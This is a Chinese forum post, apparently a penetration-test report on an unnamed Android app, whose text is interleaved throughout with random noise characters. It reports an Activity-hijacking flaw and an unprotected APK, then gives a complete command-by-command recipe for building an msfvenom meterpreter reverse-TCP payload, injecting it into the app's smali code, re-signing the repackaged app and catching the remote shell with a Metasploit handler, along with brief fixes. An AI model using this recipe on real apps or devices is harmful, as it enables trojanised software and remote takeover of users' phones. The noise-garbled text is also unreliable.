/ R3 _, `: K# w9 k% _ * @# v& e3 i% j' q" O, N   1 J! H% x% S) S' D+ b6 B ; i3 k' { n$ `

; g/ y' W5 |) }, @, o3 ?, O) ]7 w1 V5 F- k' Z3 k9 E: A7 M

% f4 P& m8 o: X2 r1 Q3 |: _ * Q3 r. @/ T' J) O; j6 ?5 w 2 检测结果                    3 `/ D6 U! R% Y6 t% j. \ $ y2 w1 n- K4 s8 n" f

6 F" m4 ^# w( _0 g; Z' T7 f8 f7 O7 m$ ^. M3 W. { R6 U

: D. }0 ], w+ r+ U0 B 2 e$ }5 K- S K 2.1 某某某 7 ~! f5 E, G8 p! c) Z/ {( ] 3 U6 z: Y; }; k6 T2 h" K# `( k& G% q

, f. Z; w* P0 x, I+ T: H9 z- t # d; E1 ^* @4 K5 i$ l

) `1 o& ^- ]3 u" n7 w1 _, W # K( Y; C) I1 h, M0 k3 H7 f 2.1.1检测目标 0 l3 Y- ]& R; |( i , e# X$ C! m. ^( K/ b* V

2 D; u2 V8 e: R8 ^ - B; t0 i5 P( e" z2 ?8 x

( F$ x- D: U9 N! Z& R! f" Q$ V! ^6 D0 R; W$ | 目标地址: 某某某某某某APP 3 r3 w4 m6 k) n, z4 _ 3 d: Y' o1 q- K9 Q. h

+ ]4 |4 O2 @* n0 R( t. J" l: _% O7 ]6 Q( }: a8 G u

9 H M- t J* H! C8 l # u, @. m! e4 K" u. {5 Z5 [ 2.1.2检测结果 : t- J/ k, A7 Q' d5 Q" Q' E8 v0 p7 r: E( t$ E7 ~

! f1 `& |, I$ ]# {' N) x 6 a8 l! t2 r' w, {& J

' u; u: {9 W. D0 R) e# B7 @ / Y% v) P" ?8 p- j; }3 T6 T1 e 2.1.2.1 ; N+ ^+ Q V7 }3 V 6 s7 S, k4 S8 F3 A

2 L; e* f7 r5 H) W / ^4 B, k4 d/ S/ d. J

9 Y" a& A/ S% i2 R4 T+ ?; ? 1 p. D# u) o3 Y* w 漏洞链接地址:某某某某某某APP : g% t3 k3 l8 Z ! J: `1 x# e& ~8 |& e

* z9 o' F2 ?; ~. ~8 Y; e' X4 _; l6 Q0 z$ @" ?

1 D: r8 s0 ]4 \1 p. _ 1 b' m1 ?! g$ A- x1 z0 ]   $ Y/ a) Z7 }4 {9 M5 H, V! j+ D6 f4 E* t! M" M' `3 w3 G

) u7 Q: ^( \; B6 V: t ^/ [1 T% a' v& r; B! ?, P6 V

3 ~4 H+ w! Z( [) s' U4 W5 N. ] # f6 U6 W: b; x& p9 S 漏洞分析及取证: % y! [" ]' @; W9 M% \ / h9 h. s" l. e$ r: U- u6 l/ Y: A

$ M3 }6 ^ B# K! ^" s/ @3 I ) y) K5 t5 J6 W) Q% D2 |; }2 Y

1 S ~2 P% j% ]- I g$ G) W0 E" V 9 z' F; I4 s+ e8 C5 U2 M9 ?                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: . O. C; p! Y9 e( r: _. N % i: s; q0 `2 \( w" [5 `

& a9 T7 h5 K- p- t) j 0 S5 _. y: n" A7 R

3 M( F3 `; ~6 a# s5 ` ; t/ q) o2 k! a- g) b8 P0 K      5 @8 d' D2 ~5 Y. l C$ }2 M ' w- W- V: u4 x2 `( o

3 z+ p& W: P) H2 ?0 J& _- O9 q* a/ O( N

+ f1 U E" f' Z/ U4 \, z m; M4 g4 m6 d# k                       1 |) L: R# c, H) X2 o+ `: G4 e/ V 2 S5 X1 a" E5 {- x7 ~

. x/ _- D+ c/ [) `. k$ \- t 7 Z0 j* m1 ]1 }

) R( U0 F! `6 q: z% R% g 3 @6 ~9 S: s4 u9 `6 h - l! V8 Q4 `9 ]( d( Q: I/ K - ]. y- x# j3 p( y

1 d/ `7 F/ |9 W ?5 X$ Y' i 6 V( g$ Z* t' W+ i1 J

c3 H% D* N! b7 j# W5 a * W" Y; A7 Z7 } G) M0 o, R1 w" f : C/ k+ l* b9 S2 P& {; D: a& l `) D2 ? / ~) }1 D+ k# s& V. w

2 P% g2 n- |4 L1 `8 O# L9 b/ s9 r1 E6 C- Q

C) i4 O2 Y. x" W8 v# s3 p7 y. F) o2 a+ P1 ^$ P% [) Z + Q+ r" a% t+ L. S) C % h* J" o, O4 v8 G. ]" a

5 M! j3 K& S8 g0 W 9 G/ `8 R/ H8 ^3 E

1 N1 Y: z( N8 v* _4 C r$ t, C, ?8 O7 Z6 Z4 g 漏洞危害:高 0 v- w) o0 I: N4 i/ f* t) |$ ~8 g$ m# K) w1 z9 b

% l( d. s7 |, s! K6 h& M % M: ~. N, x5 |! v0 ~; d4 s
" s. t9 g, I9 s) \; W( w5 A h! ^8 L: `; X3 A* } 4 X$ O% O `) L) d+ O J7 P& L/ g: N5 o# X3 ^+ e# X, _) u8 f2 n, H2 [: O/ u v- @0 m( M1 J: V6 |8 @: ]0 C) w/ w3 p1 K: w E0 i, d, D$ s- A3 w! d- s$ F6 X7 ^% @* w7 P. I) H1 G7 t9 z6 |9 K. ?* |. {+ t. N y# p( z% I: ~& ]1 m! ]1 C. o' Z& \( r, j+ Z; X# ^: t+ ?1 U1 ]. Y3 r& ?8 `# p/ S* T# O; W# k0 [* A1 Z) ~, S& q+ }) E% e' B4 S+ c+ n, k8 E) }1 J. M2 R+ `. Q/ E5 I$ N: D4 _: B5 ]9 h9 I7 T/ U3 E5 Q5 v0 E$ Q* T; }0 ^8 X$ V- R7 `+ k! a( O, b* i6 _/ _) x x9 J8 O( i& m+ ~7 x6 J, d- c. H& P* f R1 Q9 G! K2 G& ~- p. b, _9 |: e2 V+ m" t. g
2 G' i1 O* q/ e: Y( f 4 G) k9 u. r g# `+ l: N

! s; H& U6 Z$ t0 Y9 } L# c: X. x# v& C1 l 严重程度 2 J+ ^& v1 q6 Q. ]* z2 {* D 4 `# Y1 }" b5 Z0 e2 [/ b

" \8 S: ]/ f) [ ( W5 j/ r1 {0 ?# q 		& j, c1 s9 ]: R9 v; O* y % O6 O% x0 ?! }" p* M2 Q

) a$ r, H; W+ C! g# W1 A Z2 N" R ! p; O# o) Q% B6 C1 p' o # z# E9 i8 i3 c- a; }/ H + c. @# o: D+ ^& g7 A6 W I

3 J' r! E+ g' x w- x0 `5 O 7 @/ @. j4 E$ t$ I 		( m9 {8 z3 I- b t5 |! ^/ K* ~! ?$ L/ j. i1 M7 m

& C& Q8 @; I/ C. O$ `) `- ^6 W1 Z# [3 Q! e5 i& V , ?$ B, n+ ?2 ]% z8 W 8 Q6 D2 y- g# |1 I7 q2 Q

4 x8 [0 W7 }" ~ $ I" E) h; n8 o; }7 @+ y. Z( G+ O 		3 _0 S9 Z0 y7 i1 c4 s! f" s b- `5 n6 S7 g8 e# [( h

0 d1 n4 G4 j5 g/ F 0 q2 P4 z6 q. K4 {7 j# V3 g w. d4 f4 e$ L* z7 | T/ H6 |* [, K / N( U. n2 S$ s

- I. ^. d6 y) r$ }4 u0 B% m! l + _& H+ Z6 Q0 S6 a 		( j2 z8 q- V: K& [ ' p# a: |" e+ U9 ~) l: d

' H! H) S2 ~; A8 F1 t# k / [4 ~3 r* w' ?/ c B6 o3 b7 \   - a" E# F7 ~, L. N- ~! y8 O* }8 `+ G( Q5 a. s! p7 ^* z# ]

0 O% {8 z% N5 T 0 @4 L5 F$ x5 A9 E( @$ P 		% H7 M6 T3 A. {- K 0 w5 a- l0 @/ M* A) `

( @$ Z- Y3 D& l" ~# L& v5 f 6 r2 [ s' F* k: @6 j5 | # |; q8 v! m& {% N" @; u# h5 D# W" o z9 ?

& S8 K$ P! h% |! c( m & O2 J# s7 }4 ?! ~$ w 		! [% n' W5 j. N( [% _; o9 ] O; {' J+ f7 x% b9 ?( i6 _: k

2 B2 e# u' k9 S) z8 z 0 b T) o+ @7 [& Y9 H   2 h0 Q) q* b3 s' I5 D% m 7 A s# q/ ^5 }# q; C1 \1 g0 J; J

3 Q! r1 r# e$ S4 D1 ~. ] ( S# p9 L# _9 z
m; H! Y; r# O + ?) @# x- |; I' A$ ?: U$ `
) K# v" s# j( P9 l* _. f * |7 m }9 C0 d! L3 ?

2 r2 K9 m$ J' n3 _# ~1 R }* z1 A& [* \! e( u4 O   5 d1 c& |, Y7 E+ I 1 q* k4 K9 e: a" b

. A m3 q# x; W4 @" I3 }. i. f0 g+ D% J# F7 v- d9 y' E1 ?8 T8 n

% l, k& Q' b) v # n2 q+ p" Y- u- { 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ) C' w9 ~% w8 c - q4 k6 O- H% t

0 ?. Z* q. p/ b9 N; R: H/ _" a0 ~+ R$ g7 N$ ^3 _5 Z8 C k

3 a L" ]4 s t5 E) X$ R3 G a* @6 w: }& l0 I( y! C$ M3 x           6 W7 y6 a; R5 a4 a% Y 1 y" D" {+ ]3 T

" H# K0 [% X( b k# {: f 0 \) q: z2 i6 a+ B+ Q# ^ X/ Q

( R7 ?7 N& k) k _& u& T) E 5 w" B9 g3 @5 [" h   ) j# M+ D4 V# f8 R; B# U " i/ j" v) ?6 R5 n% n

0 Q. V8 T! M% R* \/ s2 h( R3 P8 g7 F( L : d9 W8 T% }, K7 |! s9 N

& _; X/ a4 Z3 B9 g5 i$ o 5 p- _# T2 e, D/ f8 [ 2.1.2.2 w& |' Z4 S! g8 r! G 3 x. S0 d' t4 Y( @$ c7 Q

, q4 l9 h, v( [7 V. n l & p7 q2 J/ P% |) v0 d, @% R

4 E' N2 V8 o1 r b5 `4 } # }) Q3 S0 P5 {, r6 q8 ~9 J 漏洞链接地址:某某某某某某APP # }: M6 j6 n- ]" o 0 K! u4 f/ V$ D/ |6 `/ [

: o$ V4 D" F. C3 G9 `' y ; {, i. I& O c% i

! {* M' h6 k0 Y % H" m9 t, k i- j! N" n 漏洞分析及取证: $ W- a/ P, A2 y" i) J & c7 ]" Z5 G' k" B

# q; v4 z5 Q" J 1 A* v5 B5 Y9 g/ ]( x

# D5 T5 |0 b- ~; q+ `1 n + n! m L$ q' e) ^                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 7 |0 X& J& z( Y* j5 e! l9 P $ ^' ], x+ v# ^( u ]7 Z

( F! K( B. p X8 n) e8 e/ t ( [* K$ ~9 X- f( n; [

1 y n5 I1 J: H) M" n* O N, j ! C% V# {2 s4 ]( T. B Metasploit 生成木马 apk 7 m( j; P* u K8 c! X8 t6 y, B3 q$ [

- f, o$ A* j# B. j6 j% O( P$ @' t0 q# `6 W

& I, |% G( c x/ x" E! [ 5 Y; g) A3 i: v. f4 f, E msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 5 e) l- H* N, A$ f# T* z% Y ( ?0 x' F" C( Y6 O

7 i( D- b" R- D% [ 1 c/ {# _* _+ o/ {! ~2 o0 @

, L) L) q9 \" u3 j1 V( d / S4 |- C7 M- S' T 反编译目标apk和木马apk ) h- i) |/ J" y ^! K% K1 r8 [, e# C

9 b* E0 t& P8 G4 [9 w9 C # ~, T C D( h O' I

+ V1 C. |$ ?$ I/ h- j 5 g x) n2 w, `" W apktool d target.apk
; q, x a' _, x, {5 R ; ~8 t. N" Q& B3 ^. a apktool d cockhorse.apk 9 {# r- n6 F5 _" t) O L7 R & E: ?. N. j9 E. i4 v

" ^# l$ N/ W* [3 d; o5 K4 a' W( k& {9 S2 z9 A, v& g

# Q7 r) T9 F4 |& c0 T4 m, y$ j 7 D6 R& {: W3 _/ J2 t p2 n 木马 apk 注入目标 apk 7 T5 E. v/ @) c9 ` 6 q& B P9 @" i) }/ f- v/ x9 W

! y# c T" [4 W3 x! _ 8 k' |0 u& i+ c. M& Z) B

1 ^0 [: j' X: U8 c9 D E5 o, X, m& y6 s0 @ 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
& s/ i0 z6 C& x! M# d7 H5 [* [8 R* _1 E X9 L invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ' P& F2 c9 j1 e, p2 V$ F# T" ^# }6 O$ I8 O9 m% Z

; n1 b$ a% }8 _5 } ; W# b% n) P7 A. ~ ^3 w2 c9 ]

& s. h. Q5 q0 J& S6 z1 L7 \+ Y% t3 B/ o' l( i 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 6 ?* n7 k% N- i4 _+ T" o9 {, A * I: [. S/ S$ [$ N$ `1 x! [

% f L4 j5 _1 U( z0 U0 P ) j0 N: X8 T7 a5 }. i/ E" b

$ ?. h- e. o, L6 Q$ f , q# |4 r: v) R1 R' @( Q3 i, K 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ) C" Z9 T% l0 f$ P' }6 g 4 I+ ~0 \; q4 w4 ~9 ^, F6 I

/ G# |0 J# [% h# r2 R" z Y 3 `/ R& X0 I9 _- Y* z

( @, y8 r/ N6 G1 L' y0 |& c: t+ i; _( e) s1 N- Z% } 回编译生成最终 apk 1 [2 o% G4 F$ n6 E7 U ' c* Z0 g) X; g) R; t& L

* X( ~+ j+ r- z) q* @ 6 r& u! C' w& N, Y& V# a4 a

" u ~8 ^0 m1 w! c- s , _+ z8 A; G' ?! k5 i, F" ~! ]& y 重新打包 5 q" E" t2 |8 F0 c / e5 A1 i J( J9 e8 K7 Q

/ x" G0 G0 I1 T$ A 5 ]! n6 R6 w$ P+ L7 {

7 P/ p! {$ }! i3 R% t / I7 y2 D6 s$ E H apktool b -o repackage.apk target_app_floder / q+ e$ V# n# r0 ^8 e ' i% Q H# w& A( Q

6 H* G2 X' E j* I3 E/ X' y8 F" V5 M$ p% v8 @

- Z% k4 D* R2 ^8 {! ?. j3 o' K# q( e1 S/ e x5 B2 K* ] 创建签名文件,有的话可忽略此步骤 3 t; N0 y0 s- @/ [: k* Z4 H% X3 m/ Y4 I! w; N3 G! J, [. }5 ?

- L' s6 x5 |7 r " H$ t0 x0 V) e5 e" R

# ]1 `$ P% C' W6 o- |; ]% H& u5 V: C5 W" G keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                5 D. f$ h0 ?5 U8 M' ` / V2 c' k7 s% _

$ R9 n+ }3 |! g" L6 S2 ]+ ? 1 ^6 g, k% k+ X9 G1 ^+ B1 _( J

" @( D5 Z3 \4 V) _4 W3 s: t9 m! ~6 X! H( p1 o 签名,以下任选其一 & p" e& u3 y4 [+ A8 g& f, T4 b$ ]0 O9 m+ K" J

, ]" [2 |; ]" }. [ N 8 j4 q# O, V2 K& E* }

( }0 c" q: a# t0 N$ J3 j' S; O, M" m jarsigner 方式 ' e2 ^2 [3 U% Q5 l 8 Z. T3 D1 |, H$ Y" [7 c

b9 N, r: @: }9 \5 p8 [ ; V: y9 v0 ?& [. L; p

4 ~) d, }; k( O" I* ` ( M/ X! e$ Z3 Y4 W: ~$ p7 i8 Z jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , h: k# I( n( }3 y/ Z1 V* Z4 j5 H; ^* y7 W* S8 _1 @

1 D" \$ s- S% p& k5 \! R M ' t5 t8 I% K9 z$ P% a4 M

! R) C: M; f) ~: d ) {3 x# s0 i: }6 {3 M* Z4 ^5 C/ K apksigner 方式 ( ?$ q, ?/ e3 y5 T & i4 c5 j1 B1 b. H Z; Q

( {+ V' j* ~& y S ) R9 _; c J9 r" ]

3 S% ^8 w$ l. b$ d( j" a0 B9 c. X# [* z3 X" k Q: o+ c' r apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 G9 l+ L3 n' C! v" L0 O$ Z 8 i' p. `: b7 Y) `* H6 a* M

7 C' A: P4 F+ A( u8 U, v l3 I9 R1 t- p0 C$ l) T

! }" O7 n: J7 G5 e m9 x & w* u/ ]# M0 R z* w( x 如需要禁用 v2签名 添加选项--v2-signing-enabled false . ~& g4 O# t) X8 J2 p1 A 2 I) Y3 F. _' S! e/ Y, X

% J6 ]: F7 L2 T5 L* c V( ~3 i' @$ i

5 [. B7 O; n3 E4 k/ U) X( x ! j! v4 ^, }/ _! Y 验证,以下任选其一 5 a- J5 P9 B0 Q0 V & p: Z+ n/ \: Y" s

0 G$ l8 I) H: F" g( @. p4 M+ K+ {# O

7 y# m2 q' p* N% d5 d" X . Z: K7 l9 S$ G! e2 D jarsigner方式 ' X4 h$ e& @5 ]1 | T0 T/ ?; u Y+ U5 V. _

* M: n1 @4 i7 f1 s 7 H0 [7 r# p- ^/ @0 T

4 b9 u4 o2 c" D! Z8 Z' p 4 l- z) S' @) H8 Z! h7 n jarsigner -verify repackaged.apk 3 h' c9 }2 L4 j1 U) t6 u2 x5 T! d1 ~5 \

! i; V6 h8 U3 T7 v% C4 Y + Q$ y# Y' i, i/ _. Q

- O2 H: v5 e7 g. a" O) w$ F' v 4 @ G- w( c/ G6 [ apksigner 方式 : b$ M# ?; W& F1 D) s8 s7 X ; l9 m7 e8 B' W

. I4 A3 @6 N5 @8 X; C8 `+ V2 `# O

. ?& ?3 g1 J y# q2 G 0 X v6 ]; ^' M/ \1 d6 W apksigner verify -v --print-certs repackaged.apk $ _: q: ]" o' J9 | , v# P7 ]0 Z: g6 m. ^0 o

* n8 `; L& I9 X" R 7 ?8 X, t2 E1 Y b3 u! B* J5 I- I

6 E. c2 p7 [% u' C* H5 p e' T5 t% R; y; _7 B& [$ M keytool方式 e- s+ X7 U. R- B B6 V/ V/ Q) R g4 `) ~. n

+ C7 \9 R7 ^: g6 Y$ H0 z" S / o! C0 U- u6 M8 k

# Z4 ]+ l/ M' j * ^' @# a' K6 d, A keytool -printcert -jarfile repackaged.apk / G% R7 }" ~# B7 J; a& o6 R6 G- t- H - T$ u; i8 P3 ^& ~' {

; x c( F" U& x- y4 H 5 w, }" T0 ~6 Z# K! {

# \) M& c5 B! u( u5 y# H7 r- T . Y& M7 }; C/ e$ H2 G* D 对齐 6 `3 J- C8 I- t3 E, U. c: X9 F. f: c, P/ @; M/ K/ M

Q- J; d( u: i H# ?- a; j- P3 t+ x

6 b. K9 G3 { ~: @ p4 z3 Z* n( y! z% q* p7 A7 B \" Q 字节对齐优化 ) Z% P1 f5 H. w6 w8 f6 O9 Y, ~. j# v$ M% u

' M/ K- v; W: Q & y) A6 n2 ]; {) P

2 g9 y3 U# u) |% U2 F. [( U- V% M# c1 o/ ]! b- O: p- K" x' C zipalign -v 4 repackaged.apk final.apk , f' _1 w8 z0 ]0 g9 M! Y7 u # f) i3 ?/ f6 W+ f" P1 h7 f1 e

$ Q; [0 E, g, E; v" ^ 8 H4 K4 \7 _- `, Z2 Q/ v

. H0 Z% @% \# e& i8 x 8 ~ ~0 i/ f/ ?% A- k! v% G 检查是否对齐 $ c' g Y. @$ s& U ' O) f. W. o N* W9 e' D

f6 v* L& t5 m. m4 R( ]; I, a8 \$ _- O! N i6 t! {

- { |9 Y" p4 V7 M( A 9 D: [! T3 M+ @3 |' p& a zipalign -c -v 4 final.apk $ i! P* U/ {+ F9 m8 o7 s, |8 f+ Y0 x 8 x: A* b7 r# N3 f

3 ^' m- E1 ]2 H 7 \$ s0 G) g: L. D# x3 G

' @- t1 }/ F. }7 f5 W( m 4 J. P6 b& d# s3 s 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 . p% t( S" J# k( { u+ U9 { 2 q$ ]( {3 l" j R2 K6 N

7 c) V# y' u. {4 |0 Q) j/ m % r7 }# _- t" ]3 \5 K

& |7 _3 A" ^- _- y8 `' ` ' e+ R: x% p' |5 J0 M 启动Metasploit控制台,配置参数等待上线 ! a2 Z7 I. ?# T6 O # P6 e* z! c! I" f" I

7 _0 y6 X2 m8 \" w2 B: G" i# R - n' \$ q' u. i7 \9 H: F8 P# {. @

* D6 C4 U; U* ]! E) e" v5 o* P2 y3 f/ B7 t2 B* r 在终端依次输入如下命令 : i( f* _/ M R; ]1 ] : | i7 F( e/ a, O, T4 h

2 W6 ^2 _% B& p/ S( d: J* o! D( q" [0 N% Q. l! T: T

7 U- F+ c4 |2 c2 v8 b: @4 T' L. {3 i2 F3 m1 n& L. V" u+ I. j! } msfconsole 7 H0 f% B7 j) a$ ~1 p" g* B * ?6 d" \. t. K1 W3 f

/ D5 }8 x7 P8 [( d+ ^9 G4 j }+ @' y6 O R

9 B5 s5 a2 M) Q' l* i6 W, U 4 j+ e; d: V% @7 I4 I/ A1 Q" m use exploit/multi/handler t7 h4 [4 k- w U9 U8 O , H! f r) _+ t& f

6 p- h' _9 u! l2 C. J0 K2 m6 ?4 T/ Q$ s# u& O( r

% O1 D& C* }) y7 B E* M* R 7 {0 l$ k% i( ]% I) [6 { set PAYLOAD android/meterpreter/reverse_tcp : W0 v/ j( F% B0 |2 V% {, { + J4 z( n) d- o. V% o

) N' \4 o; w% r0 `" L$ j ; h$ ]4 k [5 t( ` l; ?) r

( v6 k6 g. b: z, v/ n% I# p) B; f- d! w2 I, G. l6 w& [ set LHOST 192.xxx.xx.xx $ i k1 T/ J$ x: T2 x' w; w + } d5 h! N$ U7 N G3 p1 \

- K2 S {. h% C! C# y- o2 T4 O0 l5 J8 n8 ?6 H, x0 ~* E

0 k9 H3 ]' h1 P, ]' Z, y9 r& t8 w5 q R( \" L8 g1 f0 v- r% f; o set LPORT 4444 ! i0 N ^% j2 a, L, ] % o: @- z8 l5 Z; V$ N

y* W2 m6 i3 _& h+ `! v: ]9 p. A 4 C5 M* a* X9 X- L

7 F$ V! a* @% s G. b) ? m) @. x U' c- Q3 W exploit 5 l6 _* |) r! Y$ b" ` # J% ]# r5 H- J V

6 ]+ [! D/ O# o" s- M3 Q / B! |7 i5 M4 K; V# g& [

5 w" B, g1 ~* S0 d$ ?8 M' x / o! h e, P* z& N# I- M 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               0 e* N; Y; v% h3 u; E4 s9 z! ` 1 j& u$ k" q/ ~5 F/ w: r+ _5 }

) E( s1 n7 B' { E! X: |, w" S; v' Z , i, ^+ D! B# i: D) j O

' r* C1 B, i b7 { 0 T" S( A& K& Q8 {8 e 漏洞危害:中 ! ?2 t* h/ E' y7 s3 p j3 E1 I# l: C$ t

; m+ ~. B, P7 E2 ? 7 T$ [- `$ A9 I
/ S s8 L1 j! ~3 l7 c7 R 2 ]. L5 p8 c7 B( R, v2 w0 I4 c 6 p- @. B6 n" o* \ ' J' Z6 t" F3 N$ ~: \% P) B7 A/ _9 m : U# w" R$ i$ s7 D" r# V0 }8 I- G+ O/ D) x; q" _8 ]3 I7 L4 r6 M/ \2 b& D* H1 g) ^1 M/ v& k5 A3 ?) w5 v+ d: u" c" x% J9 |0 S1 @# R4 u) ~1 p$ b8 z% R7 ]) i8 q) ^- z' ?* j, e# o0 }. m% b+ S( t0 W& _# i U- S2 z2 I$ h) `9 |1 T# ` ?1 p0 _" w$ G2 Y' w3 z' k$ } _0 A6 q0 [/ ]# ^2 b3 V3 q q% c/ {- x: z2 ^! V4 n& I% C% K. N5 ^, I8 | h" M" } \! F6 w$ j$ r5 F% i1 n; v* b& J* I0 F! i7 Z% _( x5 O5 i4 i! l5 B. }; r; G A2 r. }/ x# O! U. J. Q4 c3 }8 J4 ~. \- v% y* o: G; q; A: D, `5 V5 O; J' F3 f& h3 \2 F2 q0 O5 j5 y. S" A. C; U( W, t5 E5 F, [' Y" p! v M" R$ e) I7 {) A+ I$ x5 c. R" ]7 K, i5 ^: q( @9 H! r0 Z m
+ x8 u7 {2 k8 X+ d 3 Q) x9 D( H' R0 [( S

$ w/ A8 _- g$ ? ' u: J. `; j7 o: }; ?9 R! L 严重程度 & t1 O$ Z P5 [* h/ ]$ U - G8 {3 e7 Q( ^. ]" i+ i5 @, u

1 `8 n( ` E, ~. R( d/ L+ w4 ?1 T9 f2 B1 v5 x 		: T; a; g% M \ ! k# a1 q2 I3 y- }+ G/ X# y

3 P9 Q1 k4 {2 Y1 c% F1 f/ w# G0 m# o4 k% G $ z4 q3 O5 D/ |" ]! X 6 Q7 b# \/ D6 H" |* T2 `

. A# a# b9 v7 q" f d; r0 I) ^) ]+ {, O# H* L 		( j& o0 c" c5 A& m8 H : u8 A! [. q( ^( I! m: K$ O2 H

* Z6 I* J9 P% Y" I6 B 6 x& L9 ~$ u7 _/ z & T9 ]# V4 n6 Z9 T6 S- o + l' \) h0 c: e# M" S

4 y, r) {1 B1 {& s- W$ m + g. H7 y; a6 a1 i 		, ?/ x( a9 f' }& M9 r/ K$ z2 I + Y: m9 q b1 `) R

# Y+ B8 M ^8 H& a a5 \* `- b+ d4 v& x3 f Y1 D" V3 N+ l% A " P4 d5 s/ t& H$ _, Q) t) M

% T5 Q$ S: U3 ^+ l; p& L8 b6 m% O, ^. Y' _2 c, c) ~: _* X 		& n. i+ [# @" [! x# r( |, M0 R0 X' ? 3 U$ \/ I+ Y' B& l 7 W% o% B3 N) ~0 l, V" m 7 K: P5 M: O1 X# y. D8 C5 Q

+ v3 j* Q5 _; ` 0 r+ \5 r9 e2 x   / N' ~+ i' l, j; }% S6 i1 B1 X 1 Y! w( F0 Q; ?: K9 Z) M

4 K' J% B; h$ V8 S3 v5 `3 ? 8 B6 y( K+ G! g7 {4 _1 } 		8 K7 w$ b4 `/ P. v( A: V# c" \ - @: b% g0 f4 T( Z

1 n* R1 D2 f8 r2 A( {, }5 `6 M. v3 ]5 [! x- l- j w0 T : v9 |$ Y- a+ z) w1 P/ V1 y3 U! ` Y- D) P

3 j& D! x& w/ c: N- C7 d % S& E- p- L3 P5 s0 R' `' B 		: O: R2 G) {1 C& U, p2 q% U& w0 t! c' f " S& \$ N/ K1 @- J+ C, q* J+ }5 _- h# Q! b( v: h2 K- j

+ k; f' f$ V/ S3 I' N! k+ z. h0 O ' w7 U: u; w; \" H* W/ A   , b5 a0 n1 j! X& q: a 3 K, S% }4 z2 i! \6 Z2 k* R

X" X9 A9 L# E+ O # l6 m) a5 Q: V# R( }
9 n9 a- I; Z5 \: h & @, C. i# L$ \) l2 i
( N& ? B1 q9 f9 K6 l' p8 @, H! B( h3 B+ [( n

. _5 o7 {( M- U% l) }. E) U ( s7 _$ x: j% h   5 e/ z! H' Y) K7 r" G ) E8 v9 _4 z. ^& N

9 T# E+ i+ P' @+ s # x8 V7 s. |. n4 ~; q9 t7 `" L/ M

( V' ]( U4 u) m% A + b8 j. S* c5 C* o2 R" z0 e 修复方法: ( R- ?1 s' ]/ d9 T2 `! E z# t( v! O' f

" y3 e8 W* |0 N3 P- ?( S ' A, |7 }8 H3 g, z" @3 F' e$ @

$ U4 F: \( X3 p& _ 2 O7 P2 U0 Q! O3 v               1. APP 启动时应做签名校验防止二次打包。
5 w& L+ H$ q: l8 e) L2 w+ ^) b: N, g! f, O! F+ | 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 4 {6 E# G8 [9 k) |; J% n! f , }/ E9 |. F3 u Y$ Y7 M, P9 j

. o$ ?/ r" k, [& v. Y ]& u6 l 3 o0 c8 S+ f% a. ^' Z & Z! L9 Q* O5 V " h! |6 J2 C9 R9 ~$ I. y

) a" V: K) q+ |$ I ( z: \' o N4 P% ^   3 N. c% R' h8 F& P( ~8 p5 L( H; s" z2 z! R6 n/ P

' N' [: ]# h! B) i1 w( B5 P* U $ J& ?% m4 E6 @5 x* V0 {! ?3 J& ] + Z/ p5 R1 h) @ M; V # f! {% f+ O! ^7 N* o8 x2 Z" R$ A6 B

& Y6 j n7 t8 x5 i1 `+ e 3 |$ p: b! c! X3 J* h' \0 Z9 I( B
, u5 z2 g% K& ]7 o- R# \# n / [& O: E- { h' N0 W, Q8 T

1 t8 A3 ^) B) X4 A* W * N/ D3 Y7 q+ X6 n) W/ V1 x% H. E
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表